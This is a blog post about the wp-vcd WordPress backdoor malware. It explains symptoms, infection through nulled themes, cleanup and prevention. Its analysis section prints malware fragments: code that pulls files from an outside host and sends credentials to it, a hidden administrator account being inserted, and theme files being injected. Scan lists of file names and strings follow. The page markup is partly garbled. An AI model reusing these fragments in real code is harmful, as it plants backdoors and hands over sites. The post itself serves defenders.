How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

Last Updated: 24th July, 2022

A few days back our own website experienced this wp-vcd.php Malware Attack, all of a sudden. We instantly took steps to resolve the issue with appropriate actions. We consulted with our hosting provider and later we secured our website from the wp-vcd.php Malware Attack with the help of free versions of Wordfence Security – Firewall & Malware Scan Plugin and Anti-Malware Security and Brute-Force Firewall Plugin and imposed some more security strategies.

Therefore, please don’t implement, change or delete any files without reading the full article. As we request you SHOULD NOT use each and every Security Plugins unless you know what you are doing. Finally, remember to always take a backup before whatever you do. Let’s now concentrate on our “How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected” Guide.


Data Footprint Erasure Securely Of Your Organization

Table of Contents:-


#HowTo Ensure Endpoint Security For Hybrid Cloud Security

1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?

As of late, we observed another new sort of malware infecting the WordPress websites by utilizing flaws in obsolete themes and plugins. The wp-vcd malware makes a backdoor access to your website by including hidden WordPress administrator users. Further, a few variations of the malicious codes have been believed to alter the core WordPress files and furthermore include new files in the installations /wp-includes directory.

  • The wp-vcd malware makes Spam URLs on the website (additionally alluded to as URL Injection).
  • The malware makes a backdoor passageway which enables hackers to access your website for longer periods.
  • Hackers can misuse the vulnerabilities in WordPress themes and plugins by uploading or transferring the wp-vcd malware on exposed websites.

Such a hack can be easily avoided by maintaining a strategic monitoring with a Web Application Firewall (WAF), such as Sucuri SiteCheck and customary malware scanning. It is additionally fundamental to check any modification of WordPress core files, themes and plugins.


Security Automation: Automate A Step Ahead In Challenging Times

2: The top reasons that are responsible for the wp-vcd Malware Hack.

  • The most wide recognized reason of the hack was the utilization of a nulled theme in which the wp-vcd malware as a rule comes pre-hooked with each downloaded theme from any nulled theme websites.
  • If you are still utilizing obsolete WordPress themes and plugins on your website.
  • If NO Web Application Firewall (WAF) introduced to shield hacking efforts made by hackers.

Security Groups, Firewalls, VLANs And ACLs Have Stalled: What’s Next?

3: What are the Signs and Symptoms of wp-vcd Malware?

    • A completely New WordPress Admin user has been included out of the blue.
    • Your hosting provider might have suspended your WordPress hosting account on account of wp-vcd malware attack to secure the other different websites on the same server.
    • SEO spam, for example, Japanese search results or Pharma Hack attack in Google Search Results is another very common sign and symptom of the game. Become familiar with WordPress spam in search results and how to secure them. The following is the screen capture of Google spam indexed results:

wp-vcd.php Malware Attack in Google-Search Results

  • Unknown JavaScript codes in the source of your website.
  • Pages of your website are being diverted to obscure and shady websites.
  • Unknown PHP files in your installations wp-includes folder which is not found in the WordPress GitHub repository.
  • There are PHP files in your installations wp-content/uploads directory and its sub-directory folders.

Apple WWDC 2018: What To Expect In iOS 12, macOS 10.14, watchOS and More

4: Scrutinizing of what the wp-vcd Malware does?

Within your theme (whatever theme you are using), in the functions.php file, you might observe some codes like this:

<!--?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?-->

This code incorporates the class.theme-modules.php file which as it happens installs the wp-vcd malware into different themes already installed (regardless of enabled/disabled mode) and makes the various vindictive malicious files.

Below mentioned are the different patterns for code snippets of the malware suspicious code:

Pattern 1

<!--?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code) ...; ?-->

Pattern 2

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 } ; ?>

Information Security: Objectives, Types, And Applications Simplified

Pattern 3

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Pattern 4

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    else { $ping = false; }

Pattern 5

if ($ping) { $content = @file_get_contents(‘http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘/wp-includes/class.wp.php’, file_get_contents(‘http://www.spekt[dot]cc/admin[dot]txt')); }
if ($ping2) { $content = @file_get_contents(‘http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘wp-includes/class.wp.php’, file_get_contents(‘http://www.spekt[dot]cc/admin[dot]txt'));//echo ABSPATH . ‘wp-includes/class.wp.php’; }

Pattern 6

$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100011111’, ‘100011111’, ‘\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.’, ‘100011111’, ‘[email protected]’, ‘’, ‘2010–06–07 00:00:00’, ‘’, ‘0’, ‘100010010’)”);

Insider Threats: Employees Might Compromise Up Your Entire Data

Pattern 7

if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘

’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘
’; echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘

’; } }

Pattern 8

function wp_temp_setupx($phpCode) 
 $tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setupx”);
 $handle = fopen($tmpfname, “w+”); 
 fwrite($handle, “<!--?php\n” . $phpCode); 
 include $tmpfname; unlink($tmpfname);
 return get_defined_vars();
<p><strong>Pattern 9</strong></p>
<pre><code class="language-php">
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
$post_content = preg_replace('!</p>
<div id="'.$div_code_name.'">(.*?)</div>
<p>!s', '', $data -> post_content);
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))

Artificial Intelligence (AI) Voice Impersonation Threat

</p> <p><strong>Pattern 10</strong></p> <pre><code class="language-php"> if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.spekt[dot]cc/codeX[dot]php?i=".$path)) </code> </pre> <p>There may be more patterns, but we need to understand <strong>minutely </strong>and <strong>perfectly </strong>before we act on these patterns.</p> <p>As we had analyzed in the before segment, this code would make another new administrator user with a name something like <strong>100010010</strong>. The goal of this backdoor access administrator account is to ensure that the hacker can get to the website, regardless of whether you erase the malicious code – essentially, so the attackers could attack your website at a later purpose of time.</p> <p>

Managed Service Providers (MSPs) And Managed Security Service Providers (MSSPs) Can Thrive In “Interesting Times”

</p> <h2><span id="How-to-clean-up-the-wp-vcd-Malware-Infection"></span>5: How to clean up the wp-vcd Malware Infection?</h2> <p>Scan for the events of the underneath files/strings on your server and inspect their matters. Make sure to run a <strong>diff check</strong> of the file contents with relating files in the <a href="" rel="noopener" target="_blank">WordPress core GitHub repository</a> or a plugin / theme directory. You can utilize both of the methodologies (or both) utilizing <strong>SSH </strong>(Secure Shell) or utilizing your <strong>IDE </strong>(Integrated Development Environment).</p> <h3><span id="Strategy-1-Scan-for-files-on-the-server-that-are-typically-vulnerable-to-get-infected-with-the-wp-vcd-hack"></span>5.1: <strong>Strategy: 1</strong> – Scan for files on the server that are typically vulnerable to get infected with the wp-vcd hack:</h3> <ol> <li><strong>wp-includes/wp-vcd.php</strong></li> <li>wp-includes/wp-tmp.php</li> <li>wp-content/themes/*/functions.php (each and every theme installed on the server regardless of being dynamic or not)</li> <li>class.theme-modules.php</li> <li>class.wp.php</li> <li>admin.txt</li> <li>codexc.txt</li> <li>code1.php</li> <li>cookie.txt</li> <li><strong>class.theme-modules.php</strong> (inside of your theme folder)</li> <li>codeX.php</li> <li>test.php</li> </ol> <p>

Content Services Platforms (CSPs) Must Be ‘Need-To-Know’ (NTK) Security Ready

</p> <h3><span id="Strategy-2-Scan-for-string-design-patterns-those-are-found-in-infected-malware-files"></span>5.2: <strong>Strategy: 2</strong> – Scan for string design patterns those are found in infected malware files:</h3> <ol> <li>$install_code</li> <li>tmpcontentx</li> <li>function wp_temp_setupx</li> <li>wp-tmp.php</li> <li></li> <li>stripos($tmpcontent, $wp_auth_key)</li> </ol> <p><img src="" width="755" height="378" alt="How to secure WordPress and stay protected from the Backdoor Hack" class="aligncenter size-full chobi" ?-->

Facial Recognition: Transit Facts From Then And Now

6: How to secure WordPress and stay protected from the Backdoor Hack?

  1. Create a simple yet bold security strategy for your WordPress website:
    1. Clean – Diligently make sure that your website files and the database is 100% clean and malware free.
    2. Secure – Install a good Web Application Firewall (WAF) like Wordfence Security – Firewall & Malware Scan Plugin to block any-kind of re-infection attempts.
    3. Monitor –Run regular malware scans to check if any of the files/database have been altered or not.
  2. Delete any-kind of unused WordPress themes (even if those are disabled).
  3. Totally avoid Nulled themes and plugins on your website.
  4. Regularly and religiously update the WordPress core files, Plugins and themes.

Electron Framework Vulnerabilities: Securing The Electron Apps Backdoor

7: Conclusion and VILab India Ultimate WordPress Security Guide

Disinfecting any kind of infected websites with such malware isn’t in every case simple. Since, when they are actuated on a website, they will in general infect different sections of the website also by implanting the diverse kind of malicious codes.

Moreover, this specific malware likewise makes a backdoor access which permits the trouble makers to control with your website. Consequently, it is vital to make a viable security strategy which completes an exhaustive analysis of your website. Also, a while later totally expels the hack from your website. We strongly recommend that you must follow our Ultimate WordPress Security Guide, where you can find 25+ tricks and resolutions to stay secure online.

Try hard not to be selfish. Must share with all of yours WordPress users and friends.

, , , , , , , , , , , , ,
Previous Post
FTC: Romance Scams Ranking Higher In Dissipation Than Any Other Forgeries
Next Post
Website Backdoors: How To Find, Detect, Remove, Prevent Backdoors And Secure Your Website

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed